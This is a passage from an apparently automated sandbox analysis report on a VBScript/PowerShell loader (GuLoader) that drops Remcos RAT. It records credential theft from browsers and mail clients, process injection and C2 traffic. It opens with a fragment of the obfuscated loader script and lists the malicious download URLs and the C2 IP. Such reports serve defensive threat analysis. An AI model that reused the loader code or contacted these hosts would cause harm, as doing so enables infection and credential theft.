mangn,avet kon hemo1b oc0chir.blat0 sla;strk iswafkliudt nsinu6bomb4vent;,obb poinx il6un r4 tem;jupe forrepopvtour:tele1mo,s3trep1pil .carb0 liv)u.pr wallgunsceparic skuknonvochem/sauc2 uci0vrdi1tand0bro 0kary1yngl0pupp1res tagsfins imat r iriesubsffirmo nonxhvid/exem1 rk3fodm1l,ge. o e0';$morgentaage=chirked ' biluhypossproetraerginh-un ea delgprelealr n arbt';$snyd=chirked ' anehhjulta,ietaparpjacksudsl: rog/ ops/genbfspidopr,m2kiskxsammcsvig.hin ichi cjvnguma i/nonsywisma,usivsupexhin.cmonorfairqsnved g u/ atomt areglyks ya.tfingrresuecoaln twidmesaeitab.wunnt oveotutsc';$messieurs=chirked 'diss>';$elektriciteten=chirked 'dikiisansefarbx';$fungeres='overfrsels';$teleteknikken='\mikadoerne124.sty';hypohyaline (chirked ' urt$dag,gseisl.audo cosb r taaerol.isa:tm eiimprn o,etjag uv ntidecotprogi la o dirna,greprodr ov.nsy eeinfosoct =offc$ fskesidenmin v pro:fir.a prep forps gidva.satalltdagnament+am,z$tindt halearmbljeweeldertf,eee nankfysin ignitavikad bkf geeke ln');hypohyaline (chirked ' u s$ ustg ambloceao.rilbplanasnowl c e:che tpervhtappiul mcex,ok kres parehetetr mm=suff$ly tsc ckns,miymotodansv.beamslichp vanlmoniinonrt a,a(relo$ hy,m referisksanaks fa inaboeduodube.er ma.sulyk)');hypohyaline (chirked $trappeopgangen);$snyd=$thickset[0];$antenners192=(chirked 'p ys$scuggkopulst,go briblaveasuchlwilt:hvidnp ilocontnmellpundeeomheroraoc je e.argpsenstmariip isvhy.dek mpn ygesvens klusproa= unnrickefidiwadsk-fa ko slobtoppjpuslevgeacantitfor sikkstrimykerassemitacquebr.mm sha.kart$resucreoxraareagillsfadmsfil imo.st tauuu dgdtn,ee');hypohyaline ($antenners192);hypohyaline (chirked 'halv$serpn eyeobimmn uttps kkechu rskracmetaefla,pinastbespi unavb cye krnukrnemachs rolssemi.dryshantie k.eahydrdmo.oe salrf.easvi d[aest$ topmincro vi r lingsoeneperln,nsvtlandamoseatherggemoeg,mb] reg= sc.$ iddreddiu s aiafgrnmisre prersamti gynndepogfiskesvalr');$honorifical179=chirked 'clav$unocn culore in.vidps.ape u sr couccalyeoddspporcthydrihandvtilpekompnidoteret skerssivor.st rd diso nsw ign fo Jump to behavior
              Source: msiexec.exe, 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: msiexec.exe, 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager?
              Source: msiexec.exe, 00000007.00000003.2616047029.0000000008465000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A82933 cpuid 7_2_02A82933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A82264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_02A82264
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,10_2_004082CD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0041739B GetVersionExW,9_2_0041739B
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000007.00000003.2616047029.0000000008465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3434646364.0000000008465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3136, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword10_2_004033F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword10_2_00402DB3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword10_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3136, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-D98D6XJump to behavior
              Source: Yara matchFile source: 00000007.00000003.2616047029.0000000008465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3434646364.0000000008465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3136, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              321
              Scripting
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              3
              Obfuscated Files or Information
              1
              Credentials in Registry
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)412
              Process Injection
              1
              Software Packing
              Security Account Manager3
              File and Directory Discovery
              SMB/Windows Admin Shares2
              Clipboard Data
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts22
              Command and Scripting Interpreter
              Login HookLogin Hook1
              DLL Side-Loading
              NTDS28
              System Information Discovery
              Distributed Component Object ModelInput Capture1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell
              Network Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets41
              Security Software Discovery
              SSHKeylogging2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture113
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582685 Sample: heteronymous.vbs Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 30 geoplugin.net 2->30 32 fo2xc.icu 2->32 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 11 other signatures 2->46 8 powershell.exe 17 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 50 Early bird code injection technique detected 8->50 52 Writes to foreign memory regions 8->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 8->54 56 Queues an APC in another process (thread injection) 8->56 13 msiexec.exe 3 13 8->13         started        17 conhost.exe 8->17         started        58 VBScript performs obfuscated calls to suspicious functions 11->58 60 Suspicious powershell command line found 11->60 62 Wscript starts Powershell (via cmd or directly) 11->62 64 2 other signatures 11->64 19 powershell.exe 14 18 11->19         started        process6 dnsIp7 34 154.216.18.62, 2404, 49932, 49942 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 13->34 36 geoplugin.net 178.237.33.50, 49943, 80 ATOM86-ASATOM86NL Netherlands 13->36 66 Detected Remcos RAT 13->66 68 Tries to steal Mail credentials (via file registry) 13->68 70 Maps a DLL or memory area into another process 13->70 21 msiexec.exe 2 13->21         started        24 msiexec.exe 1 13->24         started        26 msiexec.exe 1 13->26         started        38 fo2xc.icu 172.67.136.42, 443, 49713, 49905 CLOUDFLARENETUS United States 19->38 72 Found suspicious powershell code related to unpacking or dynamic code loading 19->72 28 conhost.exe 19->28         started        signatures8 process9 signatures10 48 Tries to harvest and steal browser information (history, passwords, etc) 21->48

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              heteronymous.vbs10%VirustotalBrowse
              heteronymous.vbs24%ReversingLabsScript-WScript.Trojan.GuLoader
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://fo2xc.icu/yAvXCrQD/Mestrende.to0%Avira URL Cloudsafe
              https://fo2xc.icu/xqhIDWdU/DMScwussxSJvpugnCFVarrBXuQ197.bin0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/M0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Mest0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Mestrende.toc0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD0%Avira URL Cloudsafe
              https://fo2xc.icu/xqhIDWdU/DMScwussxSJvpugnCFVarrBXuQ197.binQ0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Mes0%Avira URL Cloudsafe
              http://microsoft.co/0%Avira URL Cloudsafe
              https://fo2xc.icu0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Mestrende.tocP0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Mestrende0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvX0%Avira URL Cloudsafe
              https://fo2xc.i0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Mestrende.0%Avira URL Cloudsafe
              https://fo2xc.icu/yA0%Avira URL Cloudsafe
              https://fo2xc.ic0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Me0%Avira URL Cloudsafe
              https://fo2xc.icu/0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Mestre0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXC0%Avira URL Cloudsafe
              http://www.microsoft.cog0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Mestrende.tocXRnll0%Avira URL Cloudsafe
              https://fo2xc.icu/y0%Avira URL Cloudsafe
              http://fo2xc.icu0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Mestren0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Mestrende.t0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Mestr0%Avira URL Cloudsafe
              https://fo2xc.icu/yAv0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQD/Mestrend0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCrQ0%Avira URL Cloudsafe
              https://fo2xc.icu/yAvXCr0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              178.237.33.50
              truefalse
                high
                fo2xc.icu
                172.67.136.42
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://fo2xc.icu/yAvXCrQD/Mestrende.tocfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://fo2xc.icu/xqhIDWdU/DMScwussxSJvpugnCFVarrBXuQ197.binfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://geoplugin.net/json.gpfalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://fo2xc.icu/yAvXCrQD/powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://fo2xc.icu/xqhIDWdU/DMScwussxSJvpugnCFVarrBXuQ197.binQmsiexec.exe, 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://fo2xc.icu/yAvXCrQDpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contoso.com/Licensepowershell.exe, 00000004.00000002.2473117058.0000000005B58000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://geoplugin.net/json.gp2msiexec.exe, 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://fo2xc.icu/yAvXCrQD/Mespowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://fo2xc.icu/yAvXCrQD/Mestpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://geoplugin.net/json.gp8msiexec.exe, 00000007.00000003.2615970970.00000000084B4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2604676727.00000000084B4000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://microsoft.co/powershell.exe, 00000002.00000002.2302146865.0000020CF41A7000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://fo2xc.icu/yAvXCrQD/Mestrende.topowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://fo2xc.icu/yAvXCrQD/Mpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://fo2xc.ipowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.commsiexec.exefalse
                            high
                            https://fo2xc.icupowershell.exe, 00000002.00000002.2263250482.0000020CDBDE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2263250482.0000020CDD347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2444923908.0000000004AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://fo2xc.icu/yAvXCrQD/Mestrende.powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://contoso.com/powershell.exe, 00000004.00000002.2473117058.0000000005B58000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://fo2xc.icu/yApowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2295783227.0000020CEBC30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2473117058.0000000005B58000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://fo2xc.icu/yAvXCrQD/Mepowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://fo2xc.icu/yAvXCrQD/Mestrendepowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://geoplugin.net/json.gpSmsiexec.exe, 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://fo2xc.icpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://login.yahoo.com/config/loginmsiexec.exefalse
                                      high
                                      http://www.microsoft.cpowershell.exe, 00000002.00000002.2302146865.0000020CF41A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.nirsoft.net/msiexec.exefalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2263250482.0000020CDBBC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2444923908.0000000004AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://geoplugin.net/ZLmsiexec.exe, 00000007.00000003.2616047029.0000000008465000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://fo2xc.icu/yAvXCrQD/Mestrende.tocPpowershell.exe, 00000002.00000002.2263250482.0000020CDBDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://fo2xc.icu/yAvXpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://fo2xc.icu/msiexec.exe, 00000007.00000002.3434646364.00000000083FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://fo2xc.icu/yAvXCpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2295783227.0000020CEBC30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2473117058.0000000005B58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2444923908.0000000004C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2444923908.0000000004C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://go.micropowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://fo2xc.icu/yAvXCrQD/Mestrende.tocXRnllpowershell.exe, 00000004.00000002.2444923908.0000000004C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://fo2xc.icu/yAvXCrQD/Mestrepowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.imvu.commsiexec.exefalse
                                                        high
                                                        https://contoso.com/Iconpowershell.exe, 00000004.00000002.2473117058.0000000005B58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://geoplugin.net/json.gpsmsiexec.exe, 00000007.00000003.2615970970.00000000084B4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2604676727.00000000084B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://geoplugin.net/json.gp6ymsiexec.exe, 00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://fo2xc.icu/yAvXCrQD/Mestrende.tpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2444923908.0000000004C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://fo2xc.icu/yAvXCrQD/Mestrenpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.microsoft.cogpowershell.exe, 00000002.00000002.2302146865.0000020CF41A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://fo2xc.icu/ypowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
